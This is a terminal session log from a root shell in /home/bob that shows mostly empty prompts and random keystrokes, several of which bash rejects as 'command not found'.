root@kas:/home/bob# 
root@kas:/home/bob# w
root@kas:/home/bob# d
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# w
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# w
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# w
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# w
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# ww
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 

root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# w
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# pw
root@kas:/home/bob# s
bash: s: command not found
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob#  
root@kas:/home/bob# -
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# a
root@kas:/home/bob# 
root@kas:/home/bob# u
root@kas:/home/bob# xha
bash: xha: command not found
root@kas:/home/bob# lt
bash: lt: command not found
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# h
root@kas:/home/bob# 
root@kas:/home/bob# a
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# lt
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# t
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# 
root@kas:/home/bob# ksjdfljasfasdfj
bash: ksjdfljasfasdfj: command not found
root@kas:/home/bob# fdafdadsf
bash: fdafdadsf: command not found
root@kas:/home/bob# afdsj
bash: afdsj: command not found
root@kas:/home/bob# a
bash: a: command not found
root@kas:/home/bob# 
root@kas:/home/bob#